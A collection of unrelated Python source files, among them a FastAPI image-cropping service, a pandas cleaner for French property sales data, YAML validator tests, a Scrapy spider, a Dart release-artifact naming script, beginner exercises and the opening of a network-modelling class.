span_processor = BatchSpanProcessor(exporter)
trace.get_tracer_provider().add_span_processor(span_processor)
@app.get('/crop')
@trace_function(tracer)
def crop(url: str, width: int, height: int):
    """Download `url`, center-crop it to the width:height aspect ratio,
    shrink to at most width x height, and stream the result back as JPEG."""
    with tracer.start_as_current_span('crop') as span:
        span.set_attributes(dict(
            url=url,
            width=width,
            height=height
        ))
        temp_name = make_key()
        with tempfile.TemporaryDirectory() as work_dir:
            local_path = os.path.join(work_dir, temp_name)
            file_download(url, local_path)
            # crop + shrink, then encode to JPEG bytes
            with Image.open(local_path) as source:
                cropped = crop_handler(source, width, height)
                jpeg_bytes = save_to_jpeg(cropped)
    return StreamingResponse(BytesIO(jpeg_bytes), media_type="image/jpeg")
@app.get('/resize')
@trace_function(tracer)
def resize(url: str, width: int, height: int):
    """Download `url`, shrink it to fit within width x height (preserving
    aspect ratio, no cropping), and stream the result back as JPEG."""
    temp_file = make_key()
    with tempfile.TemporaryDirectory() as temp_dir:
        download_file = os.path.join(temp_dir, temp_file)
        file_download(url, download_file)
        with Image.open(download_file) as image:
            # Bug fix: this endpoint called crop_handler(), making /resize a
            # duplicate of /crop and leaving resize_handler() dead code; a
            # resize endpoint should only shrink, not crop.
            img = resize_handler(image, width, height)
            # 포맷 변환 (convert to JPEG bytes)
            raw_img = save_to_jpeg(img)
            return StreamingResponse(BytesIO(raw_img), media_type="image/jpeg")
@app.get('/smartcrop')
@trace_function(tracer)
def smart_crop(url: str, width: int, height: int):
    """Download `url`, content-aware-crop it to the width:height aspect
    ratio via smartcrop, shrink to width x height, and stream back as JPEG."""
    temp_name = make_key()
    with tempfile.TemporaryDirectory() as work_dir:
        local_path = os.path.join(work_dir, temp_name)
        file_download(url, local_path)
        # smart crop + shrink, then encode to JPEG bytes
        with Image.open(local_path) as source:
            cropped = smart_crop_handler(source, width, height)
            jpeg_bytes = save_to_jpeg(cropped)
    return StreamingResponse(BytesIO(jpeg_bytes), media_type="image/jpeg")
@trace_function(tracer)
def file_download(url: str, target_path: str):
    """Stream `url` to `target_path` in 1 KiB chunks.

    Raises requests.HTTPError on non-2xx responses.  Fixes: the response is
    now closed via `with` (the original leaked the connection on write
    errors), and the pointless empty-chunk `break` guard is gone --
    iter_content never yields empty chunks.
    """
    logging.info(f"start download {url=} to {target_path=}")
    with requests.get(url, stream=True) as r:
        r.raise_for_status()
        with open(target_path, 'wb') as f:
            for block in r.iter_content(1024):
                f.write(block)
    logging.info("finished download")
@trace_function(tracer)
def resize_handler(image: Image, width: int, height: int):
    # Shrink `image` in place to fit within (width, height), preserving the
    # aspect ratio, and return it.
    # NOTE(review): Image.ANTIALIAS is deprecated in favor of
    # Image.LANCZOS on newer Pillow releases -- confirm the pinned version.
    with tracer.start_as_current_span('resize_handler') as span:
        span.set_attributes(dict(
            width=width,
            height=height
        ))
        image.thumbnail((width, height), Image.ANTIALIAS)
        return image
@trace_function(tracer)
def crop_handler(image: Image, width: int, height: int, **kwargs):
    """Center-crop `image` to the width:height aspect ratio, then shrink the
    crop to fit within (width, height).  Returns a new PIL image."""
    origin_width, origin_height = image.size
    origin_aspect = origin_width / float(origin_height)
    target_aspect = width / float(height)
    if origin_aspect > target_aspect:
        # source too wide: crop the left and right edges
        new_width = int(target_aspect * origin_height)
        # Bug fix: use integer floor division -- "/" produced float box
        # coordinates, which PIL truncates, so the crop could be a pixel off
        # the requested aspect ratio.
        offset = (origin_width - new_width) // 2
        box = (offset, 0, origin_width - offset, origin_height)
    else:
        # source too tall: crop the top and bottom
        new_height = int(origin_width / target_aspect)
        offset = (origin_height - new_height) // 2
        box = (0, offset, origin_width, origin_height - offset)
    img = image.crop(box)
    img.thumbnail((width, height), Image.ANTIALIAS)
    return img
@trace_function(tracer)
def smart_crop_handler(image: Image, width: int, height: int, **kwargs):
    # Content-aware crop: ask smartcrop for the most interesting region at
    # the target aspect ratio, crop to it, then shrink to (width, height).
    sc = smartcrop.SmartCrop()
    origin_width = image.size[0]
    origin_height = image.size[1]
    origin_aspect = origin_width / float(origin_height)
    target_aspect = width / float(height)
    if origin_aspect > target_aspect:
        # source wider than target: keep full height, narrow the width
        new_width = int(target_aspect * origin_height)
        crop_size = (new_width, origin_height)
    else:
        # source taller than target: keep full width, shorten the height
        new_height = int(origin_width / target_aspect)
        crop_size = (origin_width, new_height)
    # smartcrop requires RGB input
    if image.mode != 'RGB':
        image = image.convert('RGB')
    with tracer.start_as_current_span('smart_croping') as span:
        # top_crop is smartcrop's best-scoring window of the requested size
        result = sc.crop(image, *crop_size)['top_crop']
    # convert {x, y, width, height} into a PIL (left, top, right, bottom) box
    resize = (
        result['x'],
        result['y'],
        result['width'] + result['x'],
        result['height'] + result['y']
    )
    img = image.crop(resize)
    img.thumbnail((width, height), Image.ANTIALIAS)
    return img
@trace_function(tracer)
def save_to_jpeg(image):
    """Encode a PIL image as JPEG and return the raw bytes, converting to
    RGB first since JPEG supports neither alpha nor palette modes."""
    rgb_image = image if image.mode == 'RGB' else image.convert('RGB')
    with BytesIO() as buffer:
        rgb_image.save(buffer, format='JPEG')
        return buffer.getvalue()
|
import gzip
import os
import pandas as pd

# Pandas display tuning for interactive inspection of the frames below.
pd.set_option('display.float_format', lambda x: '%.5f' % x)
# pd.set_option('display.max_columns', None)
pd.set_option('display.width', 120)
pd.set_option('display.max_rows', 100)
pd.set_option('display.min_rows', 30)
def appartement_preparation(df: pd.DataFrame) -> pd.DataFrame:
    """Clean a raw DVF transactions frame down to single-lot apartment sales.

    Keeps plain sales ("Vente") of apartments without attached land, adds a
    price-per-square-metre column, drops aberrant prices and sub-minimum
    surfaces, and normalizes the departement code to a 2-character string.
    """
    # keep only columns for work on; .copy() avoids SettingWithCopyWarning
    # on the assignments below
    df = df[["nature_mutation", "id_mutation", "date_mutation", "valeur_fonciere", "type_local",
             "surface_reelle_bati", "nombre_pieces_principales", "surface_terrain", "code_commune",
             "code_departement", "code_postal", "longitude", "latitude"]].copy()
    # keep only sales
    df = df[df["nature_mutation"] == "Vente"]
    # deleting all sales with multiple lots to keep it simple and more accurate
    df = df.drop_duplicates(subset=["id_mutation"], keep=False)
    # select only appartments
    df = df[df["type_local"] == "Appartement"]
    # keep only appartements without lands
    df = df[df["surface_terrain"].isna()]
    # calculate price per square metter and delete the most aberants entries
    df["prix_m2"] = df["valeur_fonciere"] / df["surface_reelle_bati"]
    df = df.loc[(df["prix_m2"] > 500) & (df["prix_m2"] < 20000), :]
    # keep only appartements greater than minimum viable (9 m2)
    df = df[df["surface_reelle_bati"] >= 9]
    # departement as string (because of Corsica's 2A/2B codes and geojson
    # mapping), zero-padded to 2 chars so later joins line up ("5" -> "05");
    # str.zfill replaces the original hand-rolled lambda
    df["code_departement"] = df["code_departement"].astype(str).str.zfill(2)
    df = df[["date_mutation", "valeur_fonciere", "surface_reelle_bati", "nombre_pieces_principales",
             "code_departement", "code_postal", "code_commune", "longitude", "latitude", "prix_m2"]]
    return df
def maison_preparation(df: pd.DataFrame) -> pd.DataFrame:
    """Clean a raw yearly DVF transactions dump down to house sales.

    Same pipeline as appartement_preparation but selects "Maison" rows and
    keeps the surface_terrain column in the output.

    :param df: raw transactions DataFrame (one row per mutation lot)
    :return: cleaned DataFrame with a prix_m2 column
    """
    # keep only columns we work on; .copy() so the later column assignments
    # operate on an independent frame (avoids SettingWithCopyWarning)
    df = df[["nature_mutation", "id_mutation", "date_mutation", "valeur_fonciere", "type_local",
             "surface_reelle_bati", "nombre_pieces_principales", "surface_terrain", "code_commune",
             "code_departement", "code_postal", "longitude", "latitude"]].copy()
    # keep only sales
    df = df[df["nature_mutation"] == "Vente"]
    # deleting all sales with multiple lots to keep it simple and more accurate
    df = df.drop_duplicates(subset=["id_mutation"], keep=False)
    # select only houses (the original comment said "appartments" -- copy/paste)
    df = df[df["type_local"] == "Maison"].copy()
    # calculate price per square metre and delete the most aberrant entries
    df["prix_m2"] = df["valeur_fonciere"] / df["surface_reelle_bati"]
    df = df.loc[(df["prix_m2"] > 500) & (df["prix_m2"] < 20000), :]
    # keep only houses greater than the minimum viable surface
    df = df[df["surface_reelle_bati"] >= 9]
    # convert code departement to string mainly because of 2A and 2B departements
    # and for geojson mapping; zfill pads "5" -> "05" for joins later
    df["code_departement"] = df["code_departement"].astype(str).str.zfill(2)
    df = df[["date_mutation", "valeur_fonciere", "surface_reelle_bati", "nombre_pieces_principales", "surface_terrain",
             "code_departement", "code_postal", "code_commune", "longitude", "latitude", "prix_m2"]]
    return df
def data_work(preparation_function: callable) -> tuple:
    """Run *preparation_function* over every yearly raw dump (2014-2020).

    :param preparation_function: one of the *_preparation cleaners above
    :return: (clean_df, yearly_departement_prices_df) where clean_df is the
        concatenation of all cleaned years indexed by mutation date, and the
        second frame holds per-departement median/decile prices, one column
        group per year
    """
    def yearly_stats(group, year) -> pd.Series:
        """Median and 1st/9th decile of prix_m2 for one departement group."""
        labels = [f"{year}_median", f"{year}_decile_1", f"{year}_decile_9"]
        values = [group["prix_m2"].median(),
                  group["prix_m2"].quantile(0.1),
                  group["prix_m2"].quantile(0.9)]
        return pd.Series(dict(zip(labels, values)), index=labels)
    # cleaned per-year frames, mostly for ML
    prepared_frames = []
    # per-year departement aggregates, mostly for map generation
    departement_frames = []
    for year in range(2014, 2021):
        with gzip.open(f'data/immobilier/transactions_raw/full{year}.csv.gz', 'rb') as fh:
            raw = pd.read_csv(fh)
        # apply the desired preparation function and collect the result
        prepared = preparation_function(raw)
        prepared_frames.append(prepared)
        # aggregate prices by departement (median + deciles) for this year
        per_departement = (prepared[["code_departement", "prix_m2"]]
                           .groupby(["code_departement"])
                           .apply(yearly_stats, year))
        departement_frames.append(per_departement)
    clean_df = pd.concat(prepared_frames, axis=0)
    yearly_departement_prices_df = pd.concat(departement_frames, axis=1)
    clean_df = clean_df.set_index("date_mutation")
    clean_df.index = pd.to_datetime(clean_df.index)
    return clean_df, yearly_departement_prices_df
def save_essential_data():
    """Build the cleaned apartment dataset for all years and write it to CSV.

    Reads each yearly raw dump, cleans it with appartement_preparation,
    concatenates the years, indexes by mutation date, and writes the result
    under data/immobilier/data_clean/.
    """
    df_list = []
    for year in range(2014, 2021):
        # Consistency fix: the raw dumps live under data/immobilier/ -- the
        # path data_work() reads from and the directory this function writes
        # back to; the original path omitted the "immobilier" segment.
        with gzip.open(f'data/immobilier/transactions_raw/full{year}.csv.gz', 'rb') as f:
            df = pd.read_csv(f)
        df_app = appartement_preparation(df)
        # debug aid: show which departements are present for this year
        print(df_app["code_departement"].unique().tolist())
        df_list.append(df_app)
    dfs = pd.concat(df_list)
    dfs = dfs.set_index("date_mutation")
    dfs.index = pd.to_datetime(dfs.index)
    dfs.to_csv("data/immobilier/data_clean/appartements.csv")
if __name__ == "__main__":
    # Build the cleaned house dataset plus the per-departement m2 price
    # aggregates and persist both as CSV.
    clean_houses, departement_prices = data_work(maison_preparation)
    clean_houses.to_csv("data/immobilier/data_clean/maison.csv")
    departement_prices.to_csv("data/immobilier/data_clean/m2_maison_price_per_departement.csv")
|
"""
Tests for YAML file validation
"""
import sys
import os
from jsonschema import ValidationError
from codado import fromdir
from pytest import fixture, raises
from mock import patch
from yamlschema.lib import ValidateYAML
@fixture
def options():
    """A ValidateYAML options object preloaded with the test schema path."""
    opts = ValidateYAML()
    opts['yamlSchema'] = fromdir(__file__)('test_config.schema.yml')
    return opts
@fixture
def configGood():
    """Path to a YAML config file expected to satisfy the test schema."""
    return fromdir(__file__)('test_config.yml')
@fixture
def configBad():
    """Path to a YAML config file expected to violate the test schema."""
    return fromdir(__file__)('test_config_bad.yml')
def test_postOptionsOk(options, configGood):
    """
    Does a good config pass?
    """
    options['yamlFile'] = configGood
    # silence the command's console output while it validates
    pOut = patch.object(sys, 'stdout', autospec=True)
    pErr = patch.object(sys, 'stderr', autospec=True)
    with pOut, pErr:
        x = options.postOptions()
    # `x == True` (flake8 E712) tightened to an identity check: the success
    # path should return the True singleton, not merely a truthy value
    assert x is True
def test_postOptionsBad(options, configBad):
    """
    Does a bad config fail?
    """
    options['yamlFile'] = configBad
    # silence console output; the bad config must raise ValidationError
    with patch.object(sys, 'stdout', autospec=True), \
            patch.object(sys, 'stderr', autospec=True):
        raises(ValidationError, options.postOptions)
def test_parseArgs(options):
    """
    Do we check permissions on files and report those errors?
    """
    # unreadable yamlFile -> OSError from the first os.access check
    with patch.object(os, 'access', return_value=False):
        raises(OSError, options.parseArgs, 'adafds', 'fdsa')
    # readable yamlFile but unreadable yamlSchema -> OSError on second check
    with patch.object(os, 'access', side_effect=[True, False]):
        raises(OSError, options.parseArgs, 'adafds', 'fdsa')
    # both readable -> the two positional args are stored on the options dict
    with patch.object(os, 'access', return_value=True):
        options.parseArgs('cheeses', 'meats')
        assert options['yamlFile'] == 'cheeses'
        assert options['yamlSchema'] == 'meats'
|
from scrapy.spiders import CrawlSpider
from scrapy_splash import SplashRequest
from search import luas
from search.items import SourceItem
from search.loaders import SearchLoader
class SourceCodeSpider(CrawlSpider):
    """Spider that renders a page through Splash and yields its raw source."""
    name = 'source_code_spider'
    # allowed_domains = ['search.com']
    # start_urls = ['http://search.com/']
    def __init__(self, *args, **kwargs):
        # start_urls configuration: only honor the 'url' kwarg when it was
        # actually provided. The original wrapped kwargs.get('url') in a
        # one-element list and tested the list, which is always truthy --
        # so a missing kwarg silently produced start_urls == [None].
        url = kwargs.get('url')
        if url:
            self.start_urls = [url]
        # allowed_domains configuration
        # self.allowed_domains = config.get('allowed_domains')
        super(SourceCodeSpider, self).__init__(*args, **kwargs)
    def start_requests(self):
        # Render each start URL via Splash, executing the shared Lua script
        # with image loading disabled.
        for url in self.start_urls:
            print("进入首页")
            print(url)
            yield SplashRequest(url, callback=self.parse_item, endpoint='execute', args={'lua_source': luas.luaSimple, 'images': False})
    def parse_item(self, response):
        # Store the rendered page source in a SourceItem.
        print(response.text)
        loader = SearchLoader(item=SourceItem(), response=response)
        # response.text directly; getattr(response, 'text') with a constant
        # attribute name was a needless indirection
        loader.add_value('source', response.text)
        yield loader.load_item()
|
# no.1: variables defined inside a function have local scope; variables
# defined outside a function have global scope
a=100
def show_f_l(a,b):
    # the parameter `a` shadows the global `a`; rebinding it here only
    # changes the local name
    a=a+b
    print (a)
    return a
show_f_l(5,8)
# still prints 100: the global `a` was never modified by the call above
print (a)
# no.2: use nested loops to print the prime numbers between 2 and 100
|
#!/usr/bin/env python3
#
# Copyright (c) 2012, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import hashlib
import imp
import os
import subprocess
import sys
# Absolute path of the Dart checkout root (three levels above this file).
DART_DIR = os.path.abspath(
    os.path.normpath(os.path.join(__file__, '..', '..', '..')))
def GetUtils():
    '''Dynamically load the tools/utils.py python module.'''
    # The `imp` module was deprecated since Python 3.4 and removed in 3.12;
    # use importlib to load the module from its file path instead.
    # NOTE(review): the top-of-file `import imp` can be dropped once nothing
    # else uses it.
    import importlib.util
    spec = importlib.util.spec_from_file_location(
        'utils', os.path.join(DART_DIR, 'tools', 'utils.py'))
    module = importlib.util.module_from_spec(spec)
    # imp.load_source also registered the module in sys.modules; keep that
    # behavior for any code that later does `import utils`.
    sys.modules['utils'] = module
    spec.loader.exec_module(module)
    return module
# Map build-system OS names to the canonical name used in artifact filenames.
SYSTEM_RENAMES = {
    'win32': 'windows',
    'windows': 'windows',
    'win': 'windows',
    'linux': 'linux',
    'linux2': 'linux',
    'lucid32': 'linux',
    'lucid64': 'linux',
    'darwin': 'macos',
    'mac': 'macos',
    'macos': 'macos',
}
# Map architecture names to the canonical name used in artifact filenames
# (identity today; kept for symmetry with SYSTEM_RENAMES).
ARCH_RENAMES = {
    'ia32': 'ia32',
    'x64': 'x64',
    'arm': 'arm',
    'arm64': 'arm64',
    'riscv64': 'riscv64',
}
# Map OS names to the platform identifiers CIPD uses.
SYSTEM_TO_CIPD = {
    'win32': 'windows',
    'windows': 'windows',
    'linux': 'linux',
    'macos': 'mac',
}
# Map architecture names to the identifiers CIPD uses.
ARCH_TO_CIPD = {
    'ia32': '386',
    'x64': 'amd64',
    'arm': 'arm6l',
    'arm64': 'arm64',
    'riscv64': 'riscv64',
}
class Channel(object):
    """Dart release channel identifiers used in GCS bucket paths."""
    BETA = 'beta'
    BLEEDING_EDGE = 'be'
    DEV = 'dev'
    STABLE = 'stable'
    TRY = 'try'
    INTEGRATION = 'integration'
    ALL_CHANNELS = [BETA, BLEEDING_EDGE, DEV, STABLE, TRY, INTEGRATION]
class ReleaseType(object):
    """Artifact release states used as path segments under a channel."""
    RAW = 'raw'
    SIGNED = 'signed'
    RELEASE = 'release'
    ALL_TYPES = [RAW, SIGNED, RELEASE]
class Mode(object):
    """Build modes that appear in SDK archive filenames."""
    RELEASE = 'release'
    DEBUG = 'debug'
    ALL_MODES = [RELEASE, DEBUG]
class GCSNamer(object):
    """
    This class is used for naming objects in our "gs://dart-archive/"
    GoogleCloudStorage bucket. It's structure is as follows:
    For every (channel,revision,release-type) tuple we have a base path:
    gs://dart-archive/channels/{be,beta,dev,stable,try,integration}
    /{raw,signed,release}/{revision,latest}/
    Under every base path, the following structure is used:
    - /VERSION
    - /api-docs/dartdocs-gen-api.zip
    - /sdk/dartsdk-{linux,macos,windows}-{ia32,x64}-release.zip
    """
    def __init__(self,
                 channel=Channel.BLEEDING_EDGE,
                 release_type=ReleaseType.RAW,
                 internal=False):
        # internal=True switches to the restricted-access bucket.
        assert channel in Channel.ALL_CHANNELS
        assert release_type in ReleaseType.ALL_TYPES
        self.channel = channel
        self.release_type = release_type
        if internal:
            self.bucket = 'gs://dart-archive-internal'
        else:
            self.bucket = 'gs://dart-archive'
    # Functions for querying complete gs:// filepaths
    def version_filepath(self, revision):
        """Full gs:// path of the VERSION file for *revision*."""
        return '%s/channels/%s/%s/%s/VERSION' % (self.bucket, self.channel,
                                                 self.release_type, revision)
    def sdk_zipfilepath(self, revision, system, arch, mode):
        """Full gs:// path of the SDK zip for the given platform/mode."""
        return '/'.join([
            self.sdk_directory(revision),
            self.sdk_zipfilename(system, arch, mode)
        ])
    def unstripped_filepath(self, revision, system, arch):
        """Full gs:// path of the unstripped dart binary."""
        return '/'.join([
            self._variant_directory('unstripped', revision), system, arch,
            self.unstripped_filename(system)
        ])
    def apidocs_zipfilepath(self, revision):
        """Full gs:// path of the generated api-docs zip."""
        return '/'.join(
            [self.apidocs_directory(revision),
             self.dartdocs_zipfilename()])
    # Functions for querying gs:// directories
    def base_directory(self, revision):
        """Base gs:// directory for this channel/release-type/revision."""
        return '%s/channels/%s/%s/%s' % (self.bucket, self.channel,
                                         self.release_type, revision)
    def sdk_directory(self, revision):
        """gs:// directory holding SDK archives."""
        return self._variant_directory('sdk', revision)
    def linux_packages_directory(self, revision):
        """gs:// directory holding Linux distribution packages."""
        return '/'.join([self._variant_directory('linux_packages', revision)])
    def src_directory(self, revision):
        """gs:// directory holding source archives."""
        return self._variant_directory('src', revision)
    def apidocs_directory(self, revision):
        """gs:// directory holding generated api-docs."""
        return self._variant_directory('api-docs', revision)
    def misc_directory(self, revision):
        """gs:// directory for miscellaneous artifacts."""
        return self._variant_directory('misc', revision)
    def _variant_directory(self, name, revision):
        # All variant directories hang directly off the base directory.
        return '%s/%s' % (self.base_directory(revision), name)
    # Functions for querying filenames
    def dartdocs_zipfilename(self):
        """Filename of the generated api-docs archive."""
        return 'dartdocs-gen-api.zip'
    def sdk_zipfilename(self, system, arch, mode):
        """SDK archive filename with canonicalized system/arch names."""
        assert mode in Mode.ALL_MODES
        return 'dartsdk-%s-%s-%s.zip' % (SYSTEM_RENAMES[system],
                                         ARCH_RENAMES[arch], mode)
    def unstripped_filename(self, system):
        """Platform-specific name of the unstripped dart executable."""
        return 'dart.exe' if system.startswith('win') else 'dart'
class GCSNamerApiDocs(object):
    """Namer for generated api-docs objects in gs://dartlang-api-docs."""
    def __init__(self, channel=Channel.BLEEDING_EDGE):
        assert channel in Channel.ALL_CHANNELS
        self.channel = channel
        self.bucket = 'gs://dartlang-api-docs'
    def dartdocs_dirpath(self, revision):
        """gs:// directory holding generated dartdocs for *revision*."""
        assert len('%s' % revision) > 0
        if self.channel != Channel.BLEEDING_EDGE:
            return '%s/gen-dartdocs/%s/%s' % (self.bucket, self.channel, revision)
        return '%s/gen-dartdocs/builds/%s' % (self.bucket, revision)
    def docs_latestpath(self, revision):
        """gs:// path of this channel's latest.txt marker.

        *revision* is only validated for non-emptiness, not used in the path.
        """
        assert len('%s' % revision) > 0
        return '%s/channels/%s/latest.txt' % (self.bucket, self.channel)
def run(command, env=None, shell=False, throw_on_error=True):
    """Run *command* via subprocess and return (stdout, stderr, returncode).

    When throw_on_error is set (the default) a non-zero exit code is logged
    to stderr and raised as a plain Exception.
    """
    print("Running command: ", command)
    proc = subprocess.Popen(command,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            env=env,
                            shell=shell,
                            universal_newlines=True)
    stdout, stderr = proc.communicate()
    exit_code = proc.returncode
    if throw_on_error and exit_code != 0:
        print("Failed to execute '%s'. Exit code: %s." % (command, exit_code),
              file=sys.stderr)
        print("stdout: ", stdout, file=sys.stderr)
        print("stderr: ", stderr, file=sys.stderr)
        raise Exception("Failed to execute %s." % command)
    return (stdout, stderr, exit_code)
class GSUtil(object):
    """Thin wrapper that locates and invokes the gsutil command-line tool."""
    # Resolved path of the gsutil executable, cached at class level.
    GSUTIL_PATH = None
    # When True, only the copy bundled in the Dart repo may be used.
    USE_DART_REPO_VERSION = False
    def _layzCalculateGSUtilPath(self):
        """Locate gsutil (repo copy first, then $PATH) and cache the path."""
        # NOTE(review): 'layz' looks like a typo for 'lazy'; the name is kept
        # as-is in case external callers reference it.
        if not GSUtil.GSUTIL_PATH:
            dart_gsutil = os.path.join(DART_DIR, 'third_party', 'gsutil',
                                       'gsutil')
            if os.path.isfile(dart_gsutil):
                GSUtil.GSUTIL_PATH = dart_gsutil
            elif GSUtil.USE_DART_REPO_VERSION:
                raise Exception("Dart repository version of gsutil required, "
                                "but not found.")
            else:
                # We did not find gsutil, look in path
                possible_locations = list(os.environ['PATH'].split(os.pathsep))
                for directory in possible_locations:
                    location = os.path.join(directory, 'gsutil')
                    if os.path.isfile(location):
                        GSUtil.GSUTIL_PATH = location
                        break
            assert GSUtil.GSUTIL_PATH
    def execute(self, gsutil_args):
        """Run gsutil with *gsutil_args*; returns (stdout, stderr, code)."""
        self._layzCalculateGSUtilPath()
        gsutil_command = [sys.executable, GSUtil.GSUTIL_PATH]
        return run(gsutil_command + gsutil_args)
    def upload(self,
               local_path,
               remote_path,
               recursive=False,
               multithread=False):
        """Copy *local_path* to the gs:// *remote_path* (optionally -m/-R)."""
        assert remote_path.startswith('gs://')
        if multithread:
            args = ['-m', 'cp']
        else:
            args = ['cp']
        if recursive:
            args += ['-R']
        args += [local_path, remote_path]
        self.execute(args)
    def cat(self, remote_path):
        """Return the contents of the gs:// object as a string."""
        assert remote_path.startswith('gs://')
        args = ['cat', remote_path]
        (stdout, _, _) = self.execute(args)
        return stdout
    def setGroupReadACL(self, remote_path, group):
        """Grant read access on *remote_path* to *group*."""
        args = ['acl', 'ch', '-g', '%s:R' % group, remote_path]
        self.execute(args)
    def setContentType(self, remote_path, content_type):
        """Set the Content-Type metadata header on *remote_path*."""
        args = ['setmeta', '-h', 'Content-Type:%s' % content_type, remote_path]
        self.execute(args)
    def remove(self, remote_path, recursive=False):
        """Delete the gs:// object (or tree, with recursive=True)."""
        assert remote_path.startswith('gs://')
        args = ['rm']
        if recursive:
            args += ['-R']
        args += [remote_path]
        self.execute(args)
def GetChannelFromName(name):
    """Get the channel from the name. Bleeding edge builders don't
    have a suffix."""
    # The channel, when present, is the last dash-separated segment.
    suffix = name.rsplit('-', 1)[-1]
    if suffix in Channel.ALL_CHANNELS:
        return suffix
    return Channel.BLEEDING_EDGE
|
import unittest
from katas.kyu_8.player_rank_up import playerRankUp
class PlayerRankUpTestCase(unittest.TestCase):
    """Tests for the playerRankUp kata solution."""
    def test_equals(self):
        # a high score (180) yields the exact promotion message
        self.assertEqual(playerRankUp(180),
                         'Well done! You have advanced to the qualifying sta'
                         'ge. Win 2 out of your next 3 games to rank up.')
    def test_false(self):
        # a low score (64) yields a falsy result
        self.assertFalse(playerRankUp(64))
|
# EXERCISE_6 WORK OF THE BOOK :
# Security fix: eval() on raw user input executes arbitrary code.
# ast.literal_eval only accepts Python literals (e.g. 5 or 5.0), which is
# all this exercise needs, and gives the same value for numeric input.
from ast import literal_eval
num = literal_eval(input("Enter the number User's = "))
# NOTE(review): end="" glues all five lines onto one output line -- looks
# unintended, but preserved since the book's expected output is unknown.
print("one Multiple of the User's number = ",1*num,sep="---",end="")
print("two Multiple of the User's number = ",2*num,sep="---",end="")
print("three Multiple of the User's number = ",3*num,sep="---",end="")
print("fourth Multiple of the User's number = ",4*num,sep="---",end="")
print("fiveth Multiple of the User's number = ",5*num,sep="---",end="")
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
# from django.contrib.auth.models import User
from talenthub.models import *
# Expose the talenthub models in the Django admin with default ModelAdmins.
admin.site.register(Offer)
admin.site.register(Category)
admin.site.register(Meeting)
admin.site.register(Profile)
admin.site.register(Argument)
admin.site.register(Review)
|
import numpy as np
from matplotlib.patches import Rectangle
from .point import Point
""" Recangle object from the matplotlib object, with more attributes and methods
"""
class CustomRectangle(Rectangle):
    """matplotlib Rectangle extended with a Point anchor and corner lookup."""
    def __init__(self, point, width, height, **kwargs):
        # point is the lower-left anchor as a Point; extra kwargs are
        # forwarded to matplotlib.patches.Rectangle.
        self.point = point # lower corner
        self.width = width
        self.height = height
        self.corners = None  # lazily computed by get_corners()
        super(CustomRectangle, self).__init__((point.x, point.y), width, height, **kwargs)
    def data(self):
        """Return the (anchor Point, width, height) triple."""
        return (self.point, self.width, self.height)
    def get_corners(self):
        """ Compute corners and return it
        """
        # cached after the first call
        if self.corners is not None:
            return self.corners
        point = self.point
        width = self.width
        height = self.height
        xx = [point.x, point.x + width]
        yy = [point.y, point.y + height]
        keys = [
            "bot_left",
            "bot_right",
            "top_left",
            "top_right"
        ]
        # meshgrid + dstack + reshape yields (x, y) pairs in the order
        # (x0,y0), (x1,y0), (x0,y1), (x1,y1), which matches `keys`
        # (assumes width/height >= 0 -- TODO confirm for callers)
        points = np.dstack(np.meshgrid(xx, yy)).reshape(-1, 2)
        vals = list(map(lambda pt: Point(pt[0], pt[1]), points))
        self.corners = dict(zip(keys, vals))
        return self.corners
    def setFig(self, figure):
        # NOTE(review): assigns the matplotlib Artist `figure` attribute
        # directly -- confirm this is intended vs. Artist.set_figure()
        self.figure = figure
|
"""
A class that defines the network being modeled and that contains all
modeled objects in the network such as Nodes, Interfaces, Circuits,
and Demands.
Allows a single connection (Circuit) between layer3 Nodes. If multiple
Circuits between Nodes is needed, use Parallel_Link_Model object.
This Model object will generally perform better than Parallel_Model_Object due
to the latter's requirement to check for multiple Circuits between Nodes.
"""
from pprint import pprint
import networkx as nx
from .circuit import Circuit
from .interface import Interface
from .exceptions import ModelException
from .master_model import MasterModel
from .utilities import find_end_index
from .node import Node
from .rsvp import RSVP_LSP
from .srlg import SRLG
# TODO - call to analyze model for Unrouted LSPs and LSPs not on shortest path
# TODO - add simulation summary output with # failed nodes, interfaces, srlgs, unrouted lsp/demands,
# routed lsp/demands in dict form
# TODO - look at removing the requirement that Interface circuit_id be specified since the remote side
# can be determined because only one circuit can exist between any pair of Nodes
# TODO - add support for SRLGs in load_model_file
# TODO - add attribute for Node/Interface whereby an object can be failed by itself
# and not unfail when a parent SRLG unfails
class Model(MasterModel):
"""A network model object consisting of the following base components:
- Interface objects (set): layer 3 Node interfaces. Interfaces have a
'capacity' attribute that determines how much traffic it can carry.
Note: Interfaces are matched into Circuit objects based on the
interface circuit_ids --> A pair of Interfaces with the same circuit_id
value get matched into a Circuit
- Node objects (set): vertices on the network (aka 'layer 3 devices')
that contain Interface objects. Nodes are connected to each other
via a pair of matched Interfaces (Circuits)
- Demand objects (set): traffic loads on the network. Each demand starts
from a source node and transits the network to a destination node.
A demand also has a magnitude, representing how much traffic it
is carrying. The demand's magnitude will apply against each
interface's available capacity
- RSVP LSP objects (set): RSVP LSPs in the Model
- Circuit objects are created by matching Interface objects
"""
def __init__(self, interface_objects=set(), node_objects=set(),
demand_objects=set(), rsvp_lsp_objects=set()):
self.interface_objects = interface_objects
self.node_objects = node_objects
self.demand_objects = demand_objects
self.circuit_objects = set()
self.rsvp_lsp_objects = rsvp_lsp_objects
self.srlg_objects = set()
self._parallel_lsp_groups = {}
super().__init__(interface_objects, node_objects, demand_objects, rsvp_lsp_objects)
def __repr__(self):
return 'Model(Interfaces: %s, Nodes: %s, Demands: %s, RSVP_LSPs: %s)' % (len(self.interface_objects),
len(self.node_objects),
len(self.demand_objects),
len(self.rsvp_lsp_objects))
    def add_network_interfaces_from_list(self, network_interfaces):
        """
        A tool that reads network interface info and updates an *existing* model.
        Intended to be used from CLI/interactive environment
        Interface info must be a list of dicts and in format like below example:
        network_interfaces = [
        {'name':'A-to-B', 'cost':4,'capacity':100, 'node':'A',
        'remote_node': 'B', 'circuit_id': 1, 'failed': False},
        {'name':'A-to-Bv2', 'cost':40,'capacity':150, 'node':'A',
        'remote_node': 'B', 'circuit_id': 2, 'failed': False},
        {'name':'A-to-C', 'cost':1,'capacity':200, 'node':'A',
        'remote_node': 'C', 'circuit_id': 3, 'failed': False},]
        """
        # Build Interface objects plus any Nodes not already in the model
        new_interface_objects, new_node_objects = \
            self._make_network_interfaces(network_interfaces)
        # Merge the new objects into the existing sets, then re-validate,
        # which also (re)matches interfaces into circuits
